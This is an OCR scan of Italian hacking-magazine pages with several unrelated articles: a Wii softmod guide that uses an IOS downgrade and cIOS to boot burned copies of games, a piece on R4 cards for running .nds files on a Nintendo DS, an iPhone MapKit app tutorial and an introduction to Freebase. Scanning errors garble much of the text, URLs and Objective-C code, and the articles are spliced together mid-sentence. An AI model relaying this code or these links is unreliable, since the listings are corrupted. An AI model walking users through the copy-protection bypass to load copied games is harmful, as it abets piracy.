riprodurre DVD masterizzati. 
La procedura è stata testata sulla mia 
Wii personale e funziona Tuttavia, in 
caso di necessità, in rete è presente 
numerosa documentazione. 
Vediamo dunque quali sono tutti i 



trovara operatori che la effettuino e, 


passaggi 


da eseguire: 
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Ecco il contenuto della cartella 
"zippata* che potete scaricare 
fatto sezione download del sito 
www.fiackerjournal.it. 
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Nulla di complesso basta accendere la 
console, spostarsi nella parte inferiore 
sinistra e cliccare sul pulsante Opzioni 
Wii. quindi su Impostazioni console 
Wii e leggere, nella parte superiore 
dello schermo-, a destra, il firmware in 
uso. Nel mio caso (vedi roto) la ver. è 
già la 4.2E perché la foto è stata fatta 
successivamente ad una (delle tante) 
modifiche, questo tutoria] funzrona per 
le versioni precedenti: 3.0 3.1 3.2 3.3 3.4 
4.0 4.1 e 4.2. 



□ LI STRUMENTI 



Sul Sito www.hackefjousnal.it, nella 
sezione download è disponibile il 




pacchetto, peraltro soaricabife anche 
da diversi indirizzi in rete, oontentente 
tutti gli strumenti necessari per 
procedere alla modifica. Il pacchetto 
contrassegnato con il nome Wii4 2 
è riservato solo a coloro che hanno 
instaliato un firmware 4.2. l'altro, 
denominato WiiAII, è per tutti coloro 
che hanno invece un firmware 3.0 3.1 
3.2 3.3 3.44.0 oppure 4.1. 

All'interno del pacchetto sono visibili 
i seguenti strumenti (all'interno della 
cartella apps) 

BannerBomb 

HackMii installar 

NeoGamma 

clOS, Dop-IOS 

Tnjcha Bug Resfonsr MQD 

AnyTitJe DeieterDB MOD 



LATO HARDWARE 



Per installare i software dobbiamo 
munirci di una scheda SD da 1GB 
(reperibile a buon mercato). Quindi 
serve uno slot in cui inserire la 
scheda in modo che venga letta dal 
computer e vi si possano caricare i 
"file precedentemente scompattati, 
Personalmente ho acquistato per circa 
9 euro un adattatore usb in un grande 
magazzino che va benissimo per 
questo genere di operazione. 




FORMATTARE 



La scheda SD, che andrà 
successivamente inserita 
nello slot della WS, fa 
formattata nei formato FAT 
16/32. Se avete un ti ne potete usare 
Utility Disco, con un pc potete scaricare 
httpi/Avww.sdcard.ong/consurners/ 
formatter. Dopo che la scheda è stata 
formatta occorre copiarvi ii contenuto 
del pacchetto precedentemente 
scaricato. 

All'interno del pacchetto noterete un 
file bootclf che è quello che serve per 
fare il tx»1 di avvio dalla scheda SD 
e caricare il software, questa parte, 
tuttavia, ve Sa potete anche dimenticare 
par il momento. 



DA PC A Wll 



A questo punto bisogna togliere 
la scheda SD dallo slot del PC ed 
inserirla nello slot della Wii. 
Per accedere al suo contenuto ci 
sono due modi diversi a seconda 
del firmaware installato. 
Con uria 

Wii 3.0 3.1 3.2 3.3 3.44,0 4.1 
bisogna accedere al menu deSla 
Wii -> Opzioni Wii -> Gestione dati 
-> Canali -> Wii -> Scheda SD. 
Con una Wii con firmware 
4.2 il percorso è molto 
semplificato, basta accedere 
al pulsante con l'icona della 
scheda SD che si trova in 
basso a sinistra accanto al 1 
pulsante Ppaoni Wii. 
A questo punto dovrebbe 
comparire in automatico .f, 
una scritta Load boat, 
dol/elf ? che vi chiede ,' fel 
se volete eseguire il 
programma. 

Premete su YES e aspettate il 
caricamento. 
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HOMEBREW CHANNEL 



Comparirà una schermata nera con una 
serie dì nomi di software sulla sinistra, 
accompagnati daia scritta, dopo i due 
punti, Cari be instalfed. Niente panico, 
e tutto nomiate, utilizzando il Wiimote 
possiamo spostarci tra le varie voci, 

■ -jionarc HomeBrew Channel e 
confermare l'installazione con 1 pulsante 
A (del Wiimote). HomeBrew Charme! è 
i programma die serve per eseguire 
i software HomeBrew (tipicamente 
attraverso di esso possiamo installare ì 
fife .wad che sono le applicazioni/giochi 
scaricabili anche da Wii Shop) fra cui il 
Leader per caricare le copia di backup. 
Un volta che l'installazione è completata 
sì ritorna in automatico al menu 
precedente (la schermata nera con le 
opzioni di installazione da scheda SD). 
A questo punto spostatevi usando 
sempre il WiiMote fino ad evidenziare 
BootNIii, entrate nel menu con il pulsante 
A. Selezionate Instali BootMii as t>oot£ 
(se possibile, altrimenti Instali BootMii 
as lOS) e confermate l 'installazione 
sempre con il pulsante A, Questo 
passaggio è indispensabile se si vuole 
effettuare 8 backup della Wii prima di 
procedere all'installazione del software 
supplementare come leggeremo più 
avanti. 

BACKUP DA BDOTmTÌ 



Se avete installato BootMii, potete 
a questo punto fare un bel backup 
delia console per mettervi al riparo da 
eventuali malfunzionamenti successivi e 
ricaricare tutto il software originale pre- 
modifica. 

Per fare questa operazione occorre avere 
una scheda SD con uno Spazio libero 
di 800 MB. La nostra scheda SD da un 
GB che abbiamo consigliato al lincio 
dovrebbe essere più che sufficiente. 
Ss avete insalato BootMii nel Booti, 
si può riavviare la Wii con la scheda 
SD mserita [fa il boot da qui). Se avete 
installato BootMii come IOS, 
dovete avviare il canale HomeBrew 
Channel che avete installato al 
passo precedente sempre con 
la scheda SD inserita. Una volta 
dentro HomeBrew Channel, 
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premete sul tasto Home del WiiMote, 
scegliendo di avviare BootMii. 
Dopo il boot di avvio comparirà un 
menu con 4 pulsanti (come nella foto 
sotto} per evitare di impazzire, come 
è successo a me, vi svelo subito che 
questi menu non sono navigabili con 
il Wiimote ma solo premendo i bottoni 
Power e Reset (della console). Con 
Power si navigano i menu e sotto 
menu, con il pulsante Reset si 
effettua la selezione: 
Selezionate il menu coi due ingranaggi. 
Quindi selezionate l'immagine che ha 
una freccia che va dal Chip verso la 
scheda SD. 

Confermate di voler effettuare il backup 
sulla scheda SD e attendete la fine 
della procedura Questo passo richiede 
più di 15 minuti e s in generale, dipende 
dalla velocità della scheda SD che 
avete inserito. Non preoccupatevi dì 
eventuali bad blocks segnalati durante 
il procedimento di backup, che si 
evolve scrivendo un quadratino verde 
dopo l'altro su una griglia grigia, perché 
è perfettamente normale. 
Aliatine spegnete la console tenendo 
premuto il tasto Power e rimuovete 



la scheda SD. Il programma avrà creato 
due file: NAND.bìn e KEYS.BIN sulla 
scheda. Questi file vanno conservati. 
E' bene quindi copiarli sul PC in caso 
di malfunzionamenti della console e 
necessità, quindi, di ricaricali. Copiate 
anche la cartella bootmii. 
Ora si possono cancellare dalla scheda 
SD sia i file NAND.bin e KEYS.bin che la 
cartella bootmii. 



SI RIPARTE 



Ora che avete il backup, potete avviare 
nuovamente la Wii con la scheda SD 
inserita. Ora. se avete una console con 
una versione firmware 3.4 4.0 4,1 e 
4.2 (per le versioni 3.3 o inferiori non è 
necessario) occorre approntare questo 
ulteriore passaggio per ripristinare un bug 
nel I ' IOS36 riportandolo ad una versione 
precedente, in modo da poter installare 
attraverso di esso, il clOS che ci servirà 
al passo successivo per avviare copie di 
backup. 

Questo è un passaggio piuttosto delicato 
da seguire con attenzione (personalmente 





non ho dovuto affrontarlo quindi ve lo 
riporto così come F ho trovato su alcune 
guide on-line). Si raccomanda di non 
proseguire se non si riesce ad effettuare 
qumto passaggio correttamente 
(tuttavia si può provare diverse volte ad 
eseguito senza rischiare nulla]. 

- Avviare il canale HomeBrew Charme! 
dal menu principale e tra la lista di 
programmi, scegliere di avviare Trucha 
Bug Restonjr WlÒD. 

- Una vetta avviato il programma, 
premere il pulsante B del WiiMote, 
quello nella parte inferiore, per No IOS 
Reload. Attcndérequafche istante e solo 
dopo la comparsa della scritta premere 
il tasto 1 

- A questo p unto occorre spostarsi su 
Downgrade JOS1 5 e confermare con il 
tasto A Scegliere Download IOS f rom 
NUS usando SINISTRA e DESTRA sul 
WiiMote e premere nuovamente A. Verrà 
avviata la connessione ad internet per il 
downgrade dell'lOSI 5. 

- Premere A per lo step 1 e dopo 
premere ancora .A per lo step 2. Finita 
l'installazione, verrete riportati su 
HomeBrew Channel 

Prendete fiato (un po' di affanno misto 
ad ansia è comprensibile), quindi 
procedete come segue: 

- Avviare Trucha Bug Restorer MOD 
come già visto nel precedente 
passaggio- Sezionare Sinistra dal 
WiiMote fino a scegfiere IOS1 5 alla voce 
Select which IOS to load poi premere A e 
dopo qualche secondo il tasto 1 . 

- Scegliere il SQS3S Menu e premere A 
Modificare sempre con sinistra o destra 
per fare uscire TUTTE e 3 le voci su YES. 
Premere nuovamente A sulla voce Instali 
Patehed IOS36 e selezionare Download 
IOS frani NUS con sinistra e destra. 



Dopo la connessione ad internet e la 
preparazione dei file, premere A per 



iniziare l'installazione 




RIFR 


STINU 


IQS15 


Rimane 
IOS1S: 


daffrontare il riprìstino di 



- Avviare nuovamenteTrucha Bug 
Restorer MOD, scegliere di caricare 
10S3S, premere A, quindi il tasto 1 e 
dal menu selezionate Restore IOS16 e 
selezionare Download IOS from NUS. 

- Premete A una volta finita la 
preparazione per avviare l'installazione 
e ripristinare la versione originale 















CARICARE LE 


COPIE 


Dopo tutta questa faticata si 







può procedere verso la parte più 
interessante, ovvero il caricamento dei 
DVD di backup masterizzati. Anche in 
questo caso la procedura si dirama in 
due vie: 

CONSOLE CON FIRMWARE 4.2 
Se la console è aggiornata alla 
versione di firmware 4,2 occorre 
cancellare degli "stub" che altrimenti 
impediranno l'instai fazione dì clOS, 

- Avviare HomeBrew Channel e 
scegliere AnyTrtle Deleter DB (è 
presente solo nel pacchetto Wii4_2). 

- Scegliere inizialmente come IOS 
la versione 10S36 usando Sinistra 
sui WiiMote e premere A, Premere il 
tasto 2 del WiiMote per aggiornare il 
database. 

- Selezionare System Titles 




dove è presente la lista completa degli 
IOS di sistema installati sulla console, 

- Selezionare ad urto ad uno i 
seguenti file (se presenti): IOS222, 
IOS223. IOS249 e IOS25C, quindi 
premere il pulsante A e poi di nuovo 
A per confermare la cancellazione. 
Attenzione a non cancellare altri 
IOS: solo IOS222, IOS223, IOS24B e 
IOS250! 

- Avviare i'HomeBrew Channel e 
selezionare clOS3Erev1 7. Scorrere il 
menu di HomeBrew Channel a sinistra 
e destra usando il tasto o "-" 
oppure premendo sulle frecce. 

- Scegliere che venga eseguito tramite 
IOS36 e premere A. Scegliere network 
instai lation e confermate l'installazione 
premendo nuovamente A. Anche in 
questo caso la Wii si collegllerà ad 
internet per scaricare i filo necessari 
(ovvero FIOS38). 

A questo punto proseguire secondo le 
indicazioni del paragrafo "Console con 
firmware precedente a 4,2™, gli altri, 
con firmware precedenti, partiranno 
invece direttamente da qui 

FIRMWARE PRECEDENTE A 4.2 

- Prendere una vostra copia di un 
DVD e inserirla nella console. Avviare 
l'Home-Brevv Channel. Il programma 
da utilizzare per caricare i backup è 
NeoGamma. 

- Scegliere Launch Game on DVD, 
ignorando le altre opzioni e se tutto è 
andato a buon fine, la Wii caricherà la 
copia di backup. 

Att.ne: per conservare questa modifica 
software e te altre proposte in rete, 
non bisogna più aggiornare la console 
con gli update ufficiali proposti da 
Nintendo, 



Ecco alcune schermate elei 
vari passaggi "catturata" dal 
televisore di casa. La procedura 
è andata a buon fine consentendo 
caricare le copie dei giachi 
li senza alcun problema. 



i 
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R4: ISTRUZIONI 
PER L'USD 



Installare 
file .nds sul 
Nintendo D5 
□ Ds Lite? 
Nulla di più 
semplice cdn 
la scheda r4. 



Molti lettori ci 
hanno chiesto 
delucidazioni 
sulla scheda R4 
Revolution per 
Nintendo DS Lite. Si tratta di 
un dispositivo in commercio 
che consente la lettura dei file, 
nds, quindi dà, in parole povere, 
la passibilità di caricare e fare 
girare giochi per Nintendo DS. 
Per il nostro test abbiamo 
acquistato in un negozio di 
Milano una scheda R4 SDHC. 
upgrade della Revolution, con 
micro Sd da 2GB: costo 32 euro. 
La confezione contiene: 
La scheda R4 da inserire 
neJl'alJoggiamento del Nintendo 
DS riservato alle cartucce di 
gioco. 

Un adattatore USB in cui inserire 
la micro DS per visualizzarla sul 
PC e caricarvi i contenuti. 
Una scheda micro Sd da 2 GB 
(ma il taglio può essere anche 
superiora}. 



L'uso della R4 SDHC è piuttosto 
semplice. Basta caricare un 
gioco con estensione .nds sulla 
Scheda micro SD, inserirla 
nell'alloggiamento della R4 e, 
infine, quest'ultima nel Nintendo 
DS e avviare. 

Prima di fare ciò bisogna però 
assicurarsi di caricare il kernel 
corretto, ovvero il sistema 
operativo in grado di installare 
l'interfaccia e fare girare tutti i 
componenti. 



Per fare ciò basta collegarsi 
Solitamente al sito del 
produttore, nel nostro caso 
http://vmw. r4i -sdhc.com/ 
indexe.asp, scaricare il kernel 
appropriato (nella sezione 
download) alla scheda R4 tra 
i diversi disponibili, quindi 
scompattarlo e caricare tutti 
i file contenuti nella directory 
principale della scheda SD. 
Nel nostro caso abbiamo 
caricata i seguenti file: 
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Moonmemo f cartella) 
Moonshl (cartella) 
R4iMenu (cartella] 
H4.dat 

Oca la R4 è pronta per ospitare i 
giochi Nintendo con estensione 
.nds. Avviando il Nintendo DS dopo 
averla inserita verrà visualizzata 
un'interfaccia grafica che mostra 
l'elenco di tutte le risorse ,nds, 
ovvero dei giochi, disponibili. 
Basta selezionare un gioco ed 
avviare, la scheda genererà il file 
di salvataggio refativo e si potrà 
iniziare giocare. 



PROBLEMI DIFFUSI 



Uno dei problemi più diffusi 
è il mancato caricamento 
dell'interfaccia a del gioco, Ovvero 
il sistema si blocca in un "loading" 
che non finisce mai. Si tratta 
in questo caso di un problema 
di kernel, probabilmente avete 
scaricato e installato un kernel 
non adatto a quella scheda R4. 
Per risolvere il problema basta 
scaricare !a versione corretta e 
tutto andrà a posto. 

Un altro problema decisamente 
più fastidioso è il sistema 
operativo che va in "crash" dopo 
alcuni giorni che non si utilizza 



la cartuccia R4 impedendo il 
caricamento dell'interfaccia e 
l'utiiizzo dei giochi. Si tratta di 
un problema noto che può essere 
risolto semplicemente spostando 
indietro di qualche giorno la 
data del proprio Nintendo DS. E' 
un'operazione un po' empirica ma 
funziona. Evidentemente questo 
accorgimento è piuttosto sgradito 
a chi gioca con titoli come Animai 
Crossing ohe fanno progredire il 
gfoco in base al calendario. 



iV. T'V'v 





di xdxÒ;'v$?xDxD 
xdxD.vs,xDxD@gmaiI,con} ^u.^ 





I? 



PER IPHONE 




DOVE BDND ? 
UNA SEMPLICE 
APPLICAZIDNE 
LDCATID N BASED 
PER IPHONE 



Benvenutll Svilupperemo una semplice 
applicazione loeatìon-based (LB) per iPhone, 
Le applicazioni LB sono di molti tipi, quasi 
Sempre commerciali, ma non mancano 
esempì di estreme interesse come il recente 
Serene! ipìtor (di Mark Shepard, http:// 
serendipitor.net! ohe permette di realizzare passeggiate 
surreali e situariorasìe attraverso te Città f... svolta l'angolo. 
Se non c'è il sole, immaginalo per 5 minuti")- Oppure 
come Sukey (http://sukey,Qrg/) l'applicazione utilizzata dai 
movimenti studenteschi in Inghilterra per sapere in tempo 
reale II posizionamento della polizia e le vie di fuga più 
sicure dalle situazioni più calde. 0 anche come Ubiquitous 
Anthropolpgy {http://www.fakepress.it/FP/7ps37) in cui 
un sistema LB viene utilizzato in una ricerca antropologica 
assieme alla popolazione dei Bororo, in Brasile. In generale, 
il poter avere a disposizione in tempo reale le informazioni 
relative al luogo in cui ci troviamo è utile per motivi pratici e 
per ampliare le nostre possibilità di espressione, 

INIZIAMO 



Cominceremo a studiare carne si crea una App 
partendo da un esempio molto semplice: creeremo 
un'applicazione dì base che usa il GPS ed è in grado di 
visualizzare la nostra posizione su una mappa. 
Sarà utile specificare che per sviluppare applicazioni per 
ìPhone occorre utilizzare i sistemi Apple: un Macintosh 
e un ambiente di sviluppo Xcode. Se volete distribuire 
le vostre applicazioni tramite lo sfora, dovrete anche 
pagare l'iscrizione al programma di sviluppo. 
Questa situazione comporta molti disagi per ehi crea 
applicazioni e molti vantaggi alla Apple, che mantiene 
un controllo rigidissimo sul processo. Per ora evitiamo 
questo lungo discorso perché non avremmo spazio par 
l'articolo vero e proprio (magari lo faremo in un'altra 
occasione). Intanto andate su http^/developer.apple. 
com, registratevi, scaricate Xcode con il SDK (Software 
Devetopmenì Kit) più aggiornato per ÌPhone, installatelo 
[non dà complicazioni) e via! Sì parte. 
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Immagine I: la schermata dì benvenuto diXcode, bob le opzioni 
necessarie alla creazione di progetti ili ogni tipo. Un strio IDE 
per ogni esigenza in ambiente Apple. 



□ □ME E FATTA 
UN'APPLICAZIONE 



Per rendere semplici le cose, costruiremo questa 
applicazione passo per passo, come in un classico intonai. 
Eseguito X code vi troverete davanti l'immagine 1 . 
Selezioniamo l'opzione per creare un nuovo progetto, 
selezioniamo "Applicazioni" dalla sezione "ÌOS" e, dalle 
opzioni sulla destra, selezioniamo la voce "ì/wmfow-easetf 
application". Nella sezione in basso selezioniamo "iPhone" 
dal menu a tendina e deselezioniamo l'opzione Code Data. 
Premiamo il pulsante "Cnoose..." per confermare la 
creazione. Scegliamo un luogo adatto sul nostro hard 
disk, un nome per l'applicazione {io ho scelto *Trovami"]i e 
premiamo "Save". Il primo passo è fatto! 
Il cuore di tutte le applicazioni iPhone è l'Application 
Delegate. Questo ha il compito principale di eseguire il setup 
iniziale delio schermo e di controllare quali viste [le Wew) 
vengono mostrate nei vari momenti dell'esecuzione, ognuna 
gestita dal suo WewCo/l£ro//èf. 
Nel nostro esempio l'Application Delegate si chiama 
TrùvamìAppDetegate, e osservando i due file sorgente 
Gl ".h" che contiene le definizioni e il ",m" erte contiene le 
implementazioni) vedremo che è effettivamente scarno: 
contiene solo un oggetto di tipo UiWìndow, la finestra 
principale della nostra Applicazione. 
Il kit di sviluppo offre molte librerìe tematiche organizzate in 
Framework che possiamo aggiungere al nostro progetto. 
Clicchiamo sulla voce "Frameworks" sulla sinistra dello 
schermo, nella lista degli elementi che compongono il nostro 
progetto, richiamiamo il menu contestuale, selezioniamo 
"Add™ e poi "Existing Framework". Dalla lista che apparirà 
selezioniamo "MapKitframework" e "CoreLocation. 
framework", Confermiamo con ii pulsante in basso a destra. 
Se tutto è andato bene troveremo due voci aggiuntive 
nell'elenco dai Framework aggunti al nostro progetto. 



AGGIUNGIAMO IL CODICE 



L'Application Delegate controlla i ViewController per 
gestirà l'interfaccia delle nostre applicazioni. La prima 
cosa da fare, quindi, è creare un ViewController che 
gestisca realmente la nostra mappa: lo chiameremo 
MapVìewCantroller (ma il nome è arbitrario). 
Clicchiamo sulla cartella "C/asses" nell'albero delle risorse 
del progetto, facciamo apparire il menu contestuale e 
scegliamo "Add" e poi "New File..." nei sottomenu. 
Vi troverete nelta schermata che vedete nella immagine 
2, Selezionate sulla sinistra la voce "Cocoa Touch Class". 
percreare classi adatte all'interfaccia touch dell'iPhone, 
e poi "UlViewCantroller subclass", lasciando tutte le 
opzioni in basso deselezìonate. Premete il pulsante "Next" 
e inserite il nome del file in alto: "MapViewController.m" 
(il file ".h" verrà creato automaticamente, assieme ad 
una serie di funzioni predefinite). Con questa semplice 
operazione abbiamo creato una "sotto classe" della 
classe UiViewControlier, utilizzando il metodo della 
"estensione", tipico della programmazione ad oggetti: 
data una classe di base è possibile crearne un'altra che 
ne possiede tutte le caratteristiche più quelle sviluppate 
su misura da noi (sovrapponendosi a quelle con lo stesso 
nome già esistenti nella classe di base}. 
Ora possiamo aggiungere un po' di codice al nostro 
nuovo JW^pWewConfraJ/e/' per gestire fa mappa. 
Nelle intestazioni (il file "MapViewController.il") 
aggiungiamo ii supporto per il framework MapKit, 
aggiungendo nella sezione degli import la seguente 
istruzione: 

#import 4tapKit/MapKit.h> 

Ora la nostra classe può utilizzare le funzionalità offerte 
dal framework per il mapping, e quindi possiamo 
aggiungere nella interface una proprietà di tipo 
MKMapVìew, la View (vista} Che permette di ospitare 
nelle nostre applicazioni unaGooofe Map interattiva. 
Aggiungiamo alla nostra interface la dichiarazione: 

MKMapView *mp; 

In più ci interesserà poter utilizzare anche da altre classi le 
funzioni della nostra mappa, ad esempio per controllarne 
il livello di zoom 0 la posizione: la trasformeremo in una 
proprietà del nostro ViewController, 
Dopo la parentesi graffa della chiusura della nostra 
interface aggiungiamo la dichiarazione: 

^property (nonatnmic 1 r'ettiin) MKMapVieiY *mop; 

Questa dichiarazione descrive in maggior dettaglio il 
funzionamento della nostra mappa e ci dice che verrà 
mantenuta in memoria per tutto il ciclo di vita della nostra 
applicazione: dovremo occuparci della sua rimozione dalla 
memoria quando non ne avremo più bisogno. 
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Il primo comando iniziaiizza uri oggetto mappa (afloc) 

e poi lo dimensiona su un riquadro di schermo (Frame) 

grande quanto lo schermo stesso (usando le funzioni 

offerte dalla classe UlScreen). 

Il secondo comando configura la mappa in modo da 

Utifisaare in maniera automatica il Framework di Core 

Location per cercare la posizione dell'utente. 

Il terzo comando aggiunge la mappa vera e propria al 

nostro ViewControiler, 

Così creato lo scheletro del nostro ViewContrailer, 
possiamo ora utilizzarlo nell'Application Delegate. 
Editiamo il file "TrovamiAppDelegate.h" per includere la 
mappa e il suo controller nel ['applicazione. Tra gli import 
aggiungeremo, quindi: 




Simport "MnpviewController.ir 



Immagine Z: 13 scelta tra template già pronti ci permette ài 
risparmiare un bdpo' tàlamo di contìguraiwne dei file che 
compongono la nostra applicazione, 

Occupiamoci ora dell'implementazione del nostro 
MapViewControtler, completando alcuni elementi del file 
"MapViewController.m". Per prima cosa utilizzeremo, 
subito dopo la direttiva "©implementation" che dichiara 
['inizio della nostra implementazione, il comando: 

^synthcsize mop; 

per generare in maniera automatica i metodi "getter" e 
"setter" che saranno usati per leggere e impostare i valori 
delle varie caratteristiche della nostra proprietà, 
in fondo all'implementazione, nella funzione "c/ea//oC (la 
funzione standard che si occupa di ripulire la memoria al 
termine del ciclo di vita delle istanze delle varie classi), 
inseriremo il comando: 

[mop release]; 

per liberare la memoria relativa aJla nostra mappa, non 
appena questa non ci servirà più. 
Per i meno esperti: notate come vengono invocate le 
funzioni nel dialetto C di Apple, VQbjeetive-C: le funzioni 
si chiamano "messaggi" e vengono invocate con questa 
Sintassi Che utilizza le parentesi quadre. Il precedente 
comando si può quindi leggere come "invia il messaggio 
refesse all'oggetto map™, che corrisponde all'invocazione 
di funzioni in altri dialetti del C ed in altri linguaggi. 
Nel corpo del messaggio, eliminiamo i commenti intorno 
al metodo loadVtew (canceilando i caratteri "/*" e "V 
all'inizio e fine dei metodo) e inseriamo al suo intemo i 
comandi per caricare la view: 

map = [[MKMapView a Hoc] initWithFrame:r.[LTScreen 
nrainScretn] oppi LcationFrame]] ; 
map.slwsUscr Location = ¥ES; 
self .view = ™p; 



Nello dichiarazioni aggiungeremo una istanza del nostro 
ViewController con il comando: 

MapVicwCont roller *inapController; 

E poi lo trasformeremo in proprietà nel modo già visto 
prima, con la dichiarazione: 

@proper*ty (nonotomìc, retuìrO MnpViewController 
"snopCont roller; 

Modifichiamo ora il file u .m" dell'Application Delegate 
dove aggiungeremo: 

^synthesize nrapController; 

per creare i "getter" e "setter" per il nostro ViewController, 
e, nel metodo "dealloc", aggiungeremo il comando: 

[roaptontraller release]; 

per liberare la memoria alla fine dell'esecuzione. 
Non ci resta che aggiungere ii nostro ViewController 
all'interfaccia. Possiamo farlo nel metodo 
dit/FiuisbLsunchìngWithOptiofis già presente nel file B .m", 
aggiungendo i comandi: 

mopController = [[HapViewControllei' alice] init] ; 
[window dddSubviewimapController.view] ; 

ovvero inìzializzando l'oggetto MapvìewControlìer e 
aggiungendone la view alla finestra [windov/). 
Il codice di questo primo semplice esempio è completo. 
Selezioniamo dal menu a tendina in alto a sinistra su 
Xcode le opzioni "Simulator" e "Debug", compiliamo ed 
eseguiamo il tutto cliccando sul pulsante "ButtHRun" in 
cima all'interfaccia dell'editor. Vedremo apparire sullo 
schermo dell iPhone simulato Sa mappa con evidenziata la 
posiziona attuale (il simulatore restituisce una posizione 
sempre uguale, ma quando Eo eseguirete sull'iPhone 
verranno utilizzati il GPS e la bussola). 
Il risultato è quello dell'immagine 3. 
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IL CDDICE CDMPLETn 



Di seguito trovate il codice completo di questo piccolo 
esempio, Inseriamo qui solo le componenti rilevanti: Xcode 
avrà aggiunto in maniera automatica anche altre -funzioni 
alla vostra classe che devono essere utilizzale in varie 
situazioni dei ciclo di vita delle applicazioni. Il codice qui 
incluso permette però di focalizzare l'attenzione sulle sole 
componenti che abbiamo sviluppato insieme. 

- MapVìewController.h 

ìHmport <UIKitAJIKit,h> 
^import <MQpKit/MnpKit . h> 

(Einterface MapViewCont roller : UlViewCont roller { 
MKMapView *rrap; 

} 

gproperty (rKjiiatOiivLc.retain) MKMapView *rrap; 



- MapviewCorrtroller.m 

#iinport "MopViewCont roller. h" 
^implementatimi VopViewCont roller 
^synttiesizQ msp; 

- (void)loadView { 

itwp = [[MKMapView alloc] 
initHlithFrtme: [[UlScreen moinScreenJ 
opplicoiionF rafie]] ; 

mp.showsllsorLooation = YES ; 

self .vi su = rràp; 

} 

- (void)dealloc { 

[map release]; 
[super deal loci; 



©synrtnesize mopContHJller; 

- CB00L3opplicfltion:CUIApplication *)applicntion 
didFini.shLaunchingWithOptions:CNSDictionory *) 
launchOptions { 

mnpController » [pucipViisv.Coritraller alloc] 

irati 5 

[window addSubview:raap£ontroller.view] ; 
[self .yrindow mpk^KeyAndVisible]; 
return YES; 

} 

- (void)deotloc { 

[mapController re.lco.sc]; 
[windmv release]; 
[super deolloc] ; 

} 

gend 



PRDSSIMI PASSI E 
□ □ N DLLIS I □ NI 



Questa applicazione non è ancora morto utile, ma ci 
consente di avere una base di partenza per costruire cose 
più complesse, e di capire i meccanismi di base utilizzabili 
per le nostre applicazioni location based. 
Fateci sapere se l'argomento è dì vostro interesse! 
Potremmo proseguire ed esplorare l'aggiunta di 
informazioni alle mappe, come collegarle con ì social 
nefworfr e addirittura crearne uno tutto nostro. 
Fatevi sentire! 



- TrovamiAppDeSegate.h 

Sfirrpart <UIKit/UIKit.h> 
Simport "[itapVieKtontroller.h" 
interface TrovomiAppDelegate : NSQbjÉCt 
«UIApplicntionPelegot» { 
LIWiridow *windcw; 

MapViewCont roller "mppCfflt roller; 

} 

«property (nonotonsic, retain) iBCutlet UHVmdow 

(Sproperty (nonotcmic, retain) MopvieviController 
*!rwpCont roller; 



- TrovamiAppOelegate.m 

^import 'TrovomiAppDelegate. h* 
ftmplementation TrovaBiiAppDelegflte 
^synthesize wintfaw; 



Immagine 3: il simulatore disponìbile neil'SDK non riporta la 
poisizietiù astretta rilevata dal ùPS. Una volta installata in rnt 
dispositivo reale, perù, tutto funzionerà a dovere. 
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alla scoperta 
di freebase. 
il database 

collaborativo . 



Jamie Taylor è un 
personaggio che attira 
simpatia, a partire dal sue 
aspetto che ricorda il tipico 
hippie californiano fino 
alla stia carica, "(vlinister 
of Information" di Freebase. Quando 
nell'estate 2008 presentai! sistema 
sviluppatola Metaweb al pubblico 
(www.freebase.com), piuttosto ridotto 
ma altrettanto interessato, riunitosi al 
Cubbertey Community Center di Palo 
Alto, pochi riescono a prevedere il 
successo che aura di fi a poco, ma di 
sicuro molti restano entusiasti della 
sua presentazione. Oggi, a quasi tre 
anni di distanza, Metaweb è stata 
acquisita da Google, Freebase è 
migliorato ulteriormente e la filosofia 
hacker su cui il progetto è nato e 
cresciuto sembra non essere mai 
stata persa di vista. 



La disambìgtiazione effettuata ita 
Freebase sulla stringa "Harry Parler". 
Gii automatismi sono vantaggiosi! 



□ □5'E FREEBASE? 



Freebase è un enorme database 
collaborativo, contenente dati 
strutturarti relativi a circa 20 milioni di 
entità (persone, posti, o cose), I "dati 
strutturati" sono dati ben formattati 
e dotati di un tipo ben definito (come 
ad esempio campi di un database, 
elementi di un documento XML, o 
celle df un foglio di calcolo), in modo 
da essere facilmente manipolabili 
da diversi tipi di software. Nei caso 
di Freebase i dati non solo sono 
strutturati, ma sono anche rilasciati 
con licenza Creative Commons 
Attribution (CC-BV): questo significa 
che chiunque desideri accedere ai dati 
di Freebase non solo ha i mezzi tecnici 
perfarto, ma è anche legalmente 
autorizzato a utilizzarli come meglio 
crede all'interno delle proprie 
applicazioni {legalmente!;. 
Il modo più semplice per spiegare 
cosasi può trovare in Freebase è 
colmarsi ad una delle sue pagine, ad 
esempio http://www.freeljase.eQnV 
view/en/amold_schwarzeneggeT. 
Poiché Arnold Schwarzenegger è un 
attore, all'interno di questa pagina 
compare l'elenco completo dei 
suoi film. Poiché è anche anche un 
politico, la pagina mostra il suo attuale 
incarico di governatore delia California 
e l'elenco dei suoi predecessori. 
Non solo; possiamo trovare anche 



informazioni relative ad Arnold in 
quanto "persona" (religione, parenti, 
data e luogo di nascita), "atleta" (sport 
praticati) e "autore di libri' (elènco 
di libri pubblicati!. Infine, la maggior 
parte delle informazioni presenti nella 
pagina contengono collegamenti 
ad altre pagine [chiamate topic nel 
gergo di Metaweb) che a loro volta 
presentano informazioni a volte motto 
dettagliate sulle relative entità. 
Attraverso questo esempio è possibile 
capire quali sono i principali punti di 
forza di Freebase. Prima di tutto, idatì 
che compaiono all'interno di questo 
sistema provengono dalie fonti più 
disparate (tittp://wiki.fteebase,com/ 
witó/Data_souroes)! giusto per Citarne 
alcune, Wikipedta [dalle cui infobox 
è possibile estrarre dati strutturati), 
IMDB, MusicBrainz e Netflwt. Inoltre, 
le informazioni sono tutte collegate fra 
di loro Come all'interno di un enorme 
grafo, e da ogni nodo di questa rete 



La infobox introduttiva nella pagina di 
Aragli Senwarzenegger; dati strutturati 
e riittiliSùbili facilmente. 
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è possibile raggiungerne diversi 
altri ottenendo informazioni sempre 
pertinenti e correlate. Infine, per poter 
rendere tutto questo possibile ogni 
entità è assodata a un identificativo 
ben definito, grazie al quale è possibile 
riferirsi ad essa senza incorrere in 
ambiguità. In pratica non importa da 
quante differenti fonti di dati Siano 
state recuperate le informazioni 
relative ad Arnold Schwarzenegger, 
il lavoro di Freebase è proprio quello 
di unificarle tutte e far si che Si 
riferiscano alio stesso topic. 



□ □ME FUNZIONA 



Utilizzare Freebase è semplicissimo: 
è sufficiente collegarsi al sito www. 
freebase.com e inserire del testo 
nella casella di ricerca Prima ancora 
che venga premuto invio, il motore 
avrà già suggerito diverse scelte per 
rendere più precisa la ricerca. Ad 
esempio, se inseriamo "Harry Potter" 
